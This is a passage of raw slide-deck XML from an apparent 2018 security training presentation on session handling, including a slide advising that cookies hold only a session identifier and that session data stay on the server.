              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2194" name="Sure thing, Bob!"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="432117"/>
              <a:ext cx="6648730"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3000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Sure thing, Bob!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2195" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2196" name="2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2202" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2309309" y="10122474"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2198" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2199" name="Yay!"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="432117"/>
              <a:ext cx="6648730" cy="60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3000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Yay!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2200" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2201" name="3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2207" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15798494" y="1232474"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2203" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="5DB2F4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2204" name="Server validates the session info, and now knows who it is."/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="203517"/>
              <a:ext cx="6648730"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i="1" sz="3000">
                  <a:solidFill>
                    <a:srgbClr val="5DB2F4"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Server validates the session info, and now knows who it is.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2205" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="5DB2F4"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2206" name="i"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>i</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2208" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17826223" y="3370209"/>
            <a:ext cx="6055772" cy="433495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FF320A"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2209" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16762238" y="3576346"/>
            <a:ext cx="951210" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="FF320A"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>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192"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2192"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2182"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2182"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2185"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="218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5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2207"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2207"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="23" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="22" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2184"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2184"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="27" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="28" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="29" presetClass="entr" nodeType="clickEffect" presetID="9" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2209"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2209"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="32" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="33" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="220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ID="10" grpId="9" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2197"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2197"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="40" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="41" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="10" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="42" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2186"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2186"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="11" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="218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ID="10" grpId="12" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2202"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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92" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2185" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2207" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2202" grpId="12"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2197" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2187" grpId="11"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2184" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2209" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2208" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2183" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2182" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2186" grpId="10"/>
    </p:bldLst>
  </p:timing>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3" name="User Identification"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User Identification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2214" name="Only the session identifier should be stored in the cookie, never attributes like username or their permissions.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Only the session identifier should be stored in the cookie, never attributes like username or their permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Client-side session cookies (storing session data in the cookie) should be avoided at all costs. </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>Very difficult to remotely revoke</a:t>
            </a:r>
            <a:r>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2215"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216"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217" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2218"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22"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22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224" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2225" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2226" name="Store all session data on the server-side. Cookie should have a reference only."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="9300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
